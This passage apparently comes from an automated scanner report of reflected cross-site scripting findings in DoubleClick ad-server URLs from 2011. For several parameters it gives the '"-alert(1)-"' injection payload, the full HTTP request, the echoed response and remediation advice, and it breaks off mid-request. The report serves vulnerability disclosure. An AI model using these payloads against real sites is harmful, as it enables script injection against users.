<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... leclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2% ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb197"-alert(1)-"30566853739 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=;ord=1296659838? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:33:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9127
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... &pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_im_f_anb_op_ScrFr_pk_300x250%26priorityCode%3D4654900000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26dad"-alert(1)-"eeefcf6670b was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:31:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... c%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid% ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a686a"-alert(1)-"12363754579 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:32:00 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9723
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4ac"-alert(1)-"f286bd5be45 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:32:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9723
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D% ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ae1"-alert(1)-"d5a8c8b632 was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:32:40 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 9719
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... c%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1dd4"-alert(1)-"7f0ce352b24 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1 Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D586